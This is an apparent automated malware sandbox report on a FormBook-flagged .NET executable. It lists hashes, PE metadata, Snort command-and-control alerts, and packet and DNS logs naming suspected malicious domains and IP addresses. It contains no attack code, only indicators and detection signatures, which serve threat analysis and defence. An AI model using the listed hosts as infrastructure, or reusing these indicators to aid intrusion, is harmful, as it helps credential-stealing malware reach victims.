                                             INTERQGMOInternetIncJP | IN7REq0Jv5 | malicious
                                             • 133.130.112.119
                                             INTERQGMOInternetIncJP | GDs-#09283 DIAGRAM AND PRODUCT SPECIFICATIONS.pdl.exe | malicious
                                             • 150.95.59.10
                                             INTERQGMOInternetIncJP | s0bi9t | malicious
                                             • 210.157.44.132
                                             INTERQGMOInternetIncJP | Diagram and Specifications.exe | malicious
                                             • 150.95.255.38
                                             INTERQGMOInternetIncJP | soa_02010021.exe | malicious
                                             • 150.95.255.38
                                             INTERQGMOInternetIncJP | sLtLgOtoPA.exe | malicious
                                             • 157.7.107.193
                                             INTERQGMOInternetIncJP | 94VG.arm | malicious
                                             • 157.7.100.11
                                             INTERQGMOInternetIncJP | PO08485.xlsx | malicious
                                             • 118.27.122.218
                                             INTERQGMOInternetIncJP | 7UMLyz3hby.exe | malicious
                                             • 150.95.59.9
                                             CLOUDFLARENETUS | 6TUQ9Lb5rN.exe | malicious
                                             • 172.67.190.175
                                             CLOUDFLARENETUS | ezzvG6vQ5l.exe | malicious
                                             • 172.67.195.238
                                             CLOUDFLARENETUS | Eh36aKpvNOXJcT8.exe | malicious
                                             • 104.21.19.200
                                             CLOUDFLARENETUS | 2098765434567890098765.exe | malicious
                                             • 172.67.188.154
                                             CLOUDFLARENETUS | 0987234567890.exe | malicious
                                             • 172.67.188.154
                                             CLOUDFLARENETUS | LENEEsYC55YCboo.exe | malicious
                                             • 104.21.19.200
                                             CLOUDFLARENETUS | oytu1F59dV.exe | malicious
                                             • 162.159.134.233
                                             CLOUDFLARENETUS | Early_Access.-3878_20211027.xlsb | malicious
                                             • 162.159.134.233
                                             CLOUDFLARENETUS | Betalingskvittering.exe | malicious
                                             • 104.21.40.182
                                             CLOUDFLARENETUS | Casting Invite.-859403670_20211027.xlsb | malicious
                                             • 162.159.130.233
                                             CLOUDFLARENETUS | 10272021-AM65Application.HTM | malicious
                                             • 104.18.11.207
                                             CLOUDFLARENETUS | x86_64 | malicious
                                             • 104.28.249.1
                                             CLOUDFLARENETUS | calculadora-trading-criptomonedas-binance-1 (1).apk | malicious
                                             • 172.67.169.191
                                             CLOUDFLARENETUS | calculadora-trading-criptomonedas-binance-1 (1).apk | malicious
                                             • 172.67.169.191
                                             CLOUDFLARENETUS | Nwszeclpfkywlsrvlpglyrnsilmxebigcs.exe | malicious
                                             • 162.159.133.233
                                             CLOUDFLARENETUS | GAWEVQV50254.vbs | malicious
                                             • 104.21.41.22
                                             CLOUDFLARENETUS | Hl9GJ6GvUS.exe | malicious
                                             • 162.159.134.233
                                             CLOUDFLARENETUS | 409876543456789.exe | malicious
                                             • 172.67.188.154
                                             CLOUDFLARENETUS | setup_installer.exe | malicious
                                             • 104.21.51.48
                                             CLOUDFLARENETUS | Copy Payment 10272021 pdf.exe | malicious
                                             • 104.21.1.146

                                            JA3 Fingerprints

                                            No context

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\CtTYTpaAKA.exe.log
                                             Process: C:\Users\user\Desktop\CtTYTpaAKA.exe
                                             File Type: ASCII text, with CRLF line terminators
                                             Category: dropped
                                             Size (bytes): 1216
                                             Entropy (8bit): 5.355304211458859
                                             Encrypted: false
                                             SSDEEP: 24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                             MD5: FED34146BF2F2FA59DCF8702FCC8232E
                                             SHA1: B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                             SHA-256: 123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                             SHA-512: 1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                             Malicious: true
                                             Reputation: high, very likely benign file
                                            Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                            Static File Info

                                            General

                                             File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                             Entropy (8bit): 6.652354508446339
                                             TrID:
                                             • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                             • Win32 Executable (generic) a (10002005/4) 49.78%
                                             • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                             • Generic Win/DOS Executable (2004/3) 0.01%
                                             • DOS Executable Generic (2002/1) 0.01%
                                             File name: CtTYTpaAKA.exe
                                             File size: 512000 bytes
                                             MD5: 4a640b5abfd52dc70eb962bf9f250714
                                             SHA1: 19433ceeaae0f6b678f77e8494a39de9e9d4f870
                                             SHA256: 0e636b89393a1581a2e3f4b141c9886bed9c77969569605cdb44b78d94127802
                                             SHA512: 36171523a4412146929a73e7d52999a7980f43b576107ae5d4ac65093d49c99eab76acb8527d90b018d92bd15b0c42217810e5f3f3a11bddbc791405deff0c41
                                             SSDEEP: 6144:loIQZS4/ZF0145hcJnwO88qariw5fBbP7tJOsDRYG:SIQZhfY8hcinQPpbPxJLDR
                                             File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rya..............0.............v.... ........@.. .......................@............@................................

                                            File Icon

                                             Icon Hash: 00828e8e8686b000

                                            Static PE Info

                                            General

                                             Entrypoint: 0x47e576
                                             Entrypoint Section: .text
                                             Digitally signed: false
                                             Imagebase: 0x400000
                                             Subsystem: windows gui
                                             Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE
                                             DLL Characteristics: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                             Time Stamp: 0x617972D2 [Wed Oct 27 15:40:02 2021 UTC]
                                             TLS Callbacks:
                                             CLR (.Net) Version: v4.0.30319
                                             OS Version Major: 4
                                             OS Version Minor: 0
                                             File Version Major: 4
                                             File Version Minor: 0
                                             Subsystem Version Major: 4
                                             Subsystem Version Minor: 0
                                             Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744

                                            Entrypoint Preview

                                            Instruction
                                            jmp dword ptr [00402000h]
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al

                                            Data Directories

                                             Name | Virtual Address | Virtual Size | Is in Section
                                             IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                             IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7e524 | 0x4f | .text
                                             IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x80000 | 0x5ec | .rsrc
                                             IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                             IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                             IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x82000 | 0xc | .reloc
                                             IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                             IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                             IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                             IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                             IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                             IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                             IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                             IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                             IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                             IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                            Sections

                                             Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                             .text | 0x2000 | 0x7c57c | 0x7c600 | False | 0.68001531093 | data | 6.66263317517 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                             .rsrc | 0x80000 | 0x5ec | 0x600 | False | 0.439453125 | data | 4.22334624652 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                             .reloc | 0x82000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                            Resources

                                             Name | RVA | Size | Type | Language | Country
                                             RT_VERSION | 0x80090 | 0x35c | data | |
                                             RT_MANIFEST | 0x803fc | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |

                                            Imports

                                             DLL | Import
                                             mscoree.dll | _CorExeMain

                                            Version Infos

                                             Description | Data
                                             Translation | 0x0000 0x04b0
                                             LegalCopyright | Delchamps 2015
                                             Assembly Version | 7.3.0.0
                                             InternalName | BinaryArrayTypeEn.exe
                                             FileVersion | 7.3.0.0
                                             CompanyName | Delchamps
                                             LegalTrademarks |
                                             Comments |
                                             ProductName | Platformer_AI
                                             ProductVersion | 7.3.0.0
                                             FileDescription | Platformer_AI
                                             OriginalFilename | BinaryArrayTypeEn.exe

                                            Network Behavior

                                            Snort IDS Alerts

                                             Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                             10/27/21-19:14:30.605388 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49789 | 80 | 192.168.2.3 | 203.170.80.253
                                             10/27/21-19:14:30.605388 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49789 | 80 | 192.168.2.3 | 203.170.80.253
                                             10/27/21-19:14:30.605388 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49789 | 80 | 192.168.2.3 | 203.170.80.253
                                             10/27/21-19:14:41.554748 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49816 | 80 | 192.168.2.3 | 108.167.135.122
                                             10/27/21-19:14:41.554748 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49816 | 80 | 192.168.2.3 | 108.167.135.122
                                             10/27/21-19:14:41.554748 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49816 | 80 | 192.168.2.3 | 108.167.135.122
                                             10/27/21-19:15:07.816297 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49819 | 34.102.136.180 | 192.168.2.3
                                             10/27/21-19:15:13.056881 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49820 | 80 | 192.168.2.3 | 116.212.126.191
                                             10/27/21-19:15:13.056881 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49820 | 80 | 192.168.2.3 | 116.212.126.191
                                             10/27/21-19:15:13.056881 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49820 | 80 | 192.168.2.3 | 116.212.126.191

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 27, 2021 19:14:12.858870983 CEST | 49776 | 80 | 192.168.2.3 | 157.7.107.193
Oct 27, 2021 19:14:13.138322115 CEST | 80 | 49776 | 157.7.107.193 | 192.168.2.3
Oct 27, 2021 19:14:13.138437033 CEST | 49776 | 80 | 192.168.2.3 | 157.7.107.193
Oct 27, 2021 19:14:13.138565063 CEST | 49776 | 80 | 192.168.2.3 | 157.7.107.193
Oct 27, 2021 19:14:13.417850971 CEST | 80 | 49776 | 157.7.107.193 | 192.168.2.3
Oct 27, 2021 19:14:13.425698996 CEST | 80 | 49776 | 157.7.107.193 | 192.168.2.3
Oct 27, 2021 19:14:13.425728083 CEST | 80 | 49776 | 157.7.107.193 | 192.168.2.3
Oct 27, 2021 19:14:13.425744057 CEST | 80 | 49776 | 157.7.107.193 | 192.168.2.3
Oct 27, 2021 19:14:13.425762892 CEST | 80 | 49776 | 157.7.107.193 | 192.168.2.3
Oct 27, 2021 19:14:13.425780058 CEST | 80 | 49776 | 157.7.107.193 | 192.168.2.3
Oct 27, 2021 19:14:13.425795078 CEST | 80 | 49776 | 157.7.107.193 | 192.168.2.3
Oct 27, 2021 19:14:13.425839901 CEST | 49776 | 80 | 192.168.2.3 | 157.7.107.193
Oct 27, 2021 19:14:13.425888062 CEST | 49776 | 80 | 192.168.2.3 | 157.7.107.193
Oct 27, 2021 19:14:13.426031113 CEST | 80 | 49776 | 157.7.107.193 | 192.168.2.3
Oct 27, 2021 19:14:13.426050901 CEST | 80 | 49776 | 157.7.107.193 | 192.168.2.3
Oct 27, 2021 19:14:13.426067114 CEST | 80 | 49776 | 157.7.107.193 | 192.168.2.3
Oct 27, 2021 19:14:13.426088095 CEST | 80 | 49776 | 157.7.107.193 | 192.168.2.3
Oct 27, 2021 19:14:13.426153898 CEST | 49776 | 80 | 192.168.2.3 | 157.7.107.193
Oct 27, 2021 19:14:13.426187992 CEST | 49776 | 80 | 192.168.2.3 | 157.7.107.193
Oct 27, 2021 19:14:13.624480009 CEST | 49776 | 80 | 192.168.2.3 | 157.7.107.193
Oct 27, 2021 19:14:13.706497908 CEST | 80 | 49776 | 157.7.107.193 | 192.168.2.3
Oct 27, 2021 19:14:13.706543922 CEST | 80 | 49776 | 157.7.107.193 | 192.168.2.3
Oct 27, 2021 19:14:13.706577063 CEST | 49776 | 80 | 192.168.2.3 | 157.7.107.193
Oct 27, 2021 19:14:13.706649065 CEST | 49776 | 80 | 192.168.2.3 | 157.7.107.193
Oct 27, 2021 19:14:13.706767082 CEST | 80 | 49776 | 157.7.107.193 | 192.168.2.3
Oct 27, 2021 19:14:13.706790924 CEST | 80 | 49776 | 157.7.107.193 | 192.168.2.3
Oct 27, 2021 19:14:13.706811905 CEST | 80 | 49776 | 157.7.107.193 | 192.168.2.3
Oct 27, 2021 19:14:13.706872940 CEST | 49776 | 80 | 192.168.2.3 | 157.7.107.193
Oct 27, 2021 19:14:13.706916094 CEST | 49776 | 80 | 192.168.2.3 | 157.7.107.193
Oct 27, 2021 19:14:13.903980017 CEST | 80 | 49776 | 157.7.107.193 | 192.168.2.3
Oct 27, 2021 19:14:13.904166937 CEST | 49776 | 80 | 192.168.2.3 | 157.7.107.193
Oct 27, 2021 19:14:19.023962975 CEST | 49786 | 80 | 192.168.2.3 | 104.233.161.241
Oct 27, 2021 19:14:19.347073078 CEST | 80 | 49786 | 104.233.161.241 | 192.168.2.3
Oct 27, 2021 19:14:19.347214937 CEST | 49786 | 80 | 192.168.2.3 | 104.233.161.241
Oct 27, 2021 19:14:19.347495079 CEST | 49786 | 80 | 192.168.2.3 | 104.233.161.241
Oct 27, 2021 19:14:19.670664072 CEST | 80 | 49786 | 104.233.161.241 | 192.168.2.3
Oct 27, 2021 19:14:19.671010017 CEST | 80 | 49786 | 104.233.161.241 | 192.168.2.3
Oct 27, 2021 19:14:19.671348095 CEST | 49786 | 80 | 192.168.2.3 | 104.233.161.241
Oct 27, 2021 19:14:19.672274113 CEST | 80 | 49786 | 104.233.161.241 | 192.168.2.3
Oct 27, 2021 19:14:19.672380924 CEST | 49786 | 80 | 192.168.2.3 | 104.233.161.241
Oct 27, 2021 19:14:19.993608952 CEST | 80 | 49786 | 104.233.161.241 | 192.168.2.3
Oct 27, 2021 19:14:24.801487923 CEST | 49788 | 80 | 192.168.2.3 | 45.93.101.51
Oct 27, 2021 19:14:24.933523893 CEST | 80 | 49788 | 45.93.101.51 | 192.168.2.3
Oct 27, 2021 19:14:24.933696032 CEST | 49788 | 80 | 192.168.2.3 | 45.93.101.51
Oct 27, 2021 19:14:24.933825016 CEST | 49788 | 80 | 192.168.2.3 | 45.93.101.51
Oct 27, 2021 19:14:25.065771103 CEST | 80 | 49788 | 45.93.101.51 | 192.168.2.3
Oct 27, 2021 19:14:25.242954016 CEST | 80 | 49788 | 45.93.101.51 | 192.168.2.3
Oct 27, 2021 19:14:25.242989063 CEST | 80 | 49788 | 45.93.101.51 | 192.168.2.3
Oct 27, 2021 19:14:25.243014097 CEST | 80 | 49788 | 45.93.101.51 | 192.168.2.3
Oct 27, 2021 19:14:25.243177891 CEST | 49788 | 80 | 192.168.2.3 | 45.93.101.51
Oct 27, 2021 19:14:25.243274927 CEST | 49788 | 80 | 192.168.2.3 | 45.93.101.51
Oct 27, 2021 19:14:25.244034052 CEST | 80 | 49788 | 45.93.101.51 | 192.168.2.3
Oct 27, 2021 19:14:25.244129896 CEST | 49788 | 80 | 192.168.2.3 | 45.93.101.51
Oct 27, 2021 19:14:25.375250101 CEST | 80 | 49788 | 45.93.101.51 | 192.168.2.3
Oct 27, 2021 19:14:30.316782951 CEST | 49789 | 80 | 192.168.2.3 | 203.170.80.253
Oct 27, 2021 19:14:30.605027914 CEST | 80 | 49789 | 203.170.80.253 | 192.168.2.3
Oct 27, 2021 19:14:30.605206966 CEST | 49789 | 80 | 192.168.2.3 | 203.170.80.253
Oct 27, 2021 19:14:30.605387926 CEST | 49789 | 80 | 192.168.2.3 | 203.170.80.253
Oct 27, 2021 19:14:30.894412994 CEST | 80 | 49789 | 203.170.80.253 | 192.168.2.3
Oct 27, 2021 19:14:30.894438982 CEST | 80 | 49789 | 203.170.80.253 | 192.168.2.3
Oct 27, 2021 19:14:30.894551992 CEST | 49789 | 80 | 192.168.2.3 | 203.170.80.253
Oct 27, 2021 19:14:30.894620895 CEST | 49789 | 80 | 192.168.2.3 | 203.170.80.253
Oct 27, 2021 19:14:31.180448055 CEST | 80 | 49789 | 203.170.80.253 | 192.168.2.3
Oct 27, 2021 19:14:35.938410997 CEST | 49811 | 80 | 192.168.2.3 | 18.118.119.183
Oct 27, 2021 19:14:36.087071896 CEST | 80 | 49811 | 18.118.119.183 | 192.168.2.3
Oct 27, 2021 19:14:36.087194920 CEST | 49811 | 80 | 192.168.2.3 | 18.118.119.183
Oct 27, 2021 19:14:36.087368965 CEST | 49811 | 80 | 192.168.2.3 | 18.118.119.183
Oct 27, 2021 19:14:36.235853910 CEST | 80 | 49811 | 18.118.119.183 | 192.168.2.3
Oct 27, 2021 19:14:36.235888004 CEST | 80 | 49811 | 18.118.119.183 | 192.168.2.3
Oct 27, 2021 19:14:36.235897064 CEST | 80 | 49811 | 18.118.119.183 | 192.168.2.3
Oct 27, 2021 19:14:36.236080885 CEST | 49811 | 80 | 192.168.2.3 | 18.118.119.183
Oct 27, 2021 19:14:36.236135006 CEST | 49811 | 80 | 192.168.2.3 | 18.118.119.183
Oct 27, 2021 19:14:36.384989977 CEST | 80 | 49811 | 18.118.119.183 | 192.168.2.3
Oct 27, 2021 19:14:41.410120010 CEST | 49816 | 80 | 192.168.2.3 | 108.167.135.122
Oct 27, 2021 19:14:41.550868988 CEST | 80 | 49816 | 108.167.135.122 | 192.168.2.3
Oct 27, 2021 19:14:41.554598093 CEST | 49816 | 80 | 192.168.2.3 | 108.167.135.122
Oct 27, 2021 19:14:41.554748058 CEST | 49816 | 80 | 192.168.2.3 | 108.167.135.122
Oct 27, 2021 19:14:41.696489096 CEST | 80 | 49816 | 108.167.135.122 | 192.168.2.3
Oct 27, 2021 19:14:41.696507931 CEST | 80 | 49816 | 108.167.135.122 | 192.168.2.3
Oct 27, 2021 19:14:41.696680069 CEST | 49816 | 80 | 192.168.2.3 | 108.167.135.122
Oct 27, 2021 19:14:41.696784973 CEST | 49816 | 80 | 192.168.2.3 | 108.167.135.122
Oct 27, 2021 19:14:41.837260008 CEST | 80 | 49816 | 108.167.135.122 | 192.168.2.3
Oct 27, 2021 19:14:51.956742048 CEST | 49817 | 80 | 192.168.2.3 | 156.240.150.22
Oct 27, 2021 19:14:52.189244032 CEST | 80 | 49817 | 156.240.150.22 | 192.168.2.3
Oct 27, 2021 19:14:52.189414024 CEST | 49817 | 80 | 192.168.2.3 | 156.240.150.22
Oct 27, 2021 19:14:52.189634085 CEST | 49817 | 80 | 192.168.2.3 | 156.240.150.22
Oct 27, 2021 19:14:52.424355030 CEST | 80 | 49817 | 156.240.150.22 | 192.168.2.3
Oct 27, 2021 19:14:52.424613953 CEST | 49817 | 80 | 192.168.2.3 | 156.240.150.22
Oct 27, 2021 19:14:52.660298109 CEST | 80 | 49817 | 156.240.150.22 | 192.168.2.3
Oct 27, 2021 19:14:52.660327911 CEST | 80 | 49817 | 156.240.150.22 | 192.168.2.3
Oct 27, 2021 19:14:52.660429955 CEST | 49817 | 80 | 192.168.2.3 | 156.240.150.22
Oct 27, 2021 19:14:57.472357035 CEST | 49818 | 80 | 192.168.2.3 | 172.67.216.2
Oct 27, 2021 19:14:57.489407063 CEST | 80 | 49818 | 172.67.216.2 | 192.168.2.3
Oct 27, 2021 19:14:57.489501953 CEST | 49818 | 80 | 192.168.2.3 | 172.67.216.2
Oct 27, 2021 19:14:57.489799023 CEST | 49818 | 80 | 192.168.2.3 | 172.67.216.2
Oct 27, 2021 19:14:57.506618977 CEST | 80 | 49818 | 172.67.216.2 | 192.168.2.3
Oct 27, 2021 19:14:57.515161991 CEST | 80 | 49818 | 172.67.216.2 | 192.168.2.3
Oct 27, 2021 19:14:57.515211105 CEST | 80 | 49818 | 172.67.216.2 | 192.168.2.3
Oct 27, 2021 19:14:57.515415907 CEST | 49818 | 80 | 192.168.2.3 | 172.67.216.2
Oct 27, 2021 19:14:57.515533924 CEST | 49818 | 80 | 192.168.2.3 | 172.67.216.2
Oct 27, 2021 19:14:57.532366037 CEST | 80 | 49818 | 172.67.216.2 | 192.168.2.3
Oct 27, 2021 19:15:07.617801905 CEST | 49819 | 80 | 192.168.2.3 | 34.102.136.180
Oct 27, 2021 19:15:07.636635065 CEST | 80 | 49819 | 34.102.136.180 | 192.168.2.3
Oct 27, 2021 19:15:07.637243032 CEST | 49819 | 80 | 192.168.2.3 | 34.102.136.180
Oct 27, 2021 19:15:07.637352943 CEST | 49819 | 80 | 192.168.2.3 | 34.102.136.180
Oct 27, 2021 19:15:07.656073093 CEST | 80 | 49819 | 34.102.136.180 | 192.168.2.3
Oct 27, 2021 19:15:07.816297054 CEST | 80 | 49819 | 34.102.136.180 | 192.168.2.3
Oct 27, 2021 19:15:07.816328049 CEST | 80 | 49819 | 34.102.136.180 | 192.168.2.3
Oct 27, 2021 19:15:07.816468954 CEST | 49819 | 80 | 192.168.2.3 | 34.102.136.180
Oct 27, 2021 19:15:07.816540003 CEST | 49819 | 80 | 192.168.2.3 | 34.102.136.180
Oct 27, 2021 19:15:07.835474014 CEST | 80 | 49819 | 34.102.136.180 | 192.168.2.3

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 27, 2021 19:14:12.577754974 CEST | 60823 | 53 | 192.168.2.3 | 8.8.8.8
Oct 27, 2021 19:14:12.846904039 CEST | 53 | 60823 | 8.8.8.8 | 192.168.2.3
Oct 27, 2021 19:14:18.644517899 CEST | 55102 | 53 | 192.168.2.3 | 8.8.8.8
Oct 27, 2021 19:14:19.019355059 CEST | 53 | 55102 | 8.8.8.8 | 192.168.2.3
Oct 27, 2021 19:14:24.676934004 CEST | 56236 | 53 | 192.168.2.3 | 8.8.8.8
Oct 27, 2021 19:14:24.800334930 CEST | 53 | 56236 | 8.8.8.8 | 192.168.2.3
Oct 27, 2021 19:14:30.284463882 CEST | 56527 | 53 | 192.168.2.3 | 8.8.8.8
Oct 27, 2021 19:14:30.315530062 CEST | 53 | 56527 | 8.8.8.8 | 192.168.2.3
Oct 27, 2021 19:14:35.913027048 CEST | 49559 | 53 | 192.168.2.3 | 8.8.8.8
Oct 27, 2021 19:14:35.937032938 CEST | 53 | 49559 | 8.8.8.8 | 192.168.2.3
Oct 27, 2021 19:14:41.296065092 CEST | 52650 | 53 | 192.168.2.3 | 8.8.8.8
Oct 27, 2021 19:14:41.403433084 CEST | 53 | 52650 | 8.8.8.8 | 192.168.2.3
Oct 27, 2021 19:14:46.738342047 CEST | 63297 | 53 | 192.168.2.3 | 8.8.8.8
Oct 27, 2021 19:14:46.759346008 CEST | 53 | 63297 | 8.8.8.8 | 192.168.2.3
Oct 27, 2021 19:14:51.773514032 CEST | 58361 | 53 | 192.168.2.3 | 8.8.8.8
Oct 27, 2021 19:14:51.955020905 CEST | 53 | 58361 | 8.8.8.8 | 192.168.2.3
Oct 27, 2021 19:14:57.447910070 CEST | 53615 | 53 | 192.168.2.3 | 8.8.8.8
Oct 27, 2021 19:14:57.469948053 CEST | 53 | 53615 | 8.8.8.8 | 192.168.2.3
Oct 27, 2021 19:15:07.595096111 CEST | 50728 | 53 | 192.168.2.3 | 8.8.8.8
Oct 27, 2021 19:15:07.616633892 CEST | 53 | 50728 | 8.8.8.8 | 192.168.2.3
Oct 27, 2021 19:15:12.819777966 CEST | 53777 | 53 | 192.168.2.3 | 8.8.8.8
Oct 27, 2021 19:15:12.840934992 CEST | 53 | 53777 | 8.8.8.8 | 192.168.2.3
Oct 27, 2021 19:15:18.369975090 CEST | 57106 | 53 | 192.168.2.3 | 8.8.8.8
Oct 27, 2021 19:15:18.393908978 CEST | 53 | 57106 | 8.8.8.8 | 192.168.2.3

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Oct 27, 2021 19:14:12.577754974 CEST | 192.168.2.3 | 8.8.8.8 | 0x44db | Standard query (0) | www.isshinn1.com | A (IP address) | IN (0x0001)
Oct 27, 2021 19:14:18.644517899 CEST | 192.168.2.3 | 8.8.8.8 | 0x40d | Standard query (0) | www.rdoi.top | A (IP address) | IN (0x0001)
Oct 27, 2021 19:14:24.676934004 CEST | 192.168.2.3 | 8.8.8.8 | 0xe7e1 | Standard query (0) | www.megacinema.club | A (IP address) | IN (0x0001)
Oct 27, 2021 19:14:30.284463882 CEST | 192.168.2.3 | 8.8.8.8 | 0x9895 | Standard query (0) | www.passiverewardssystems.com | A (IP address) | IN (0x0001)
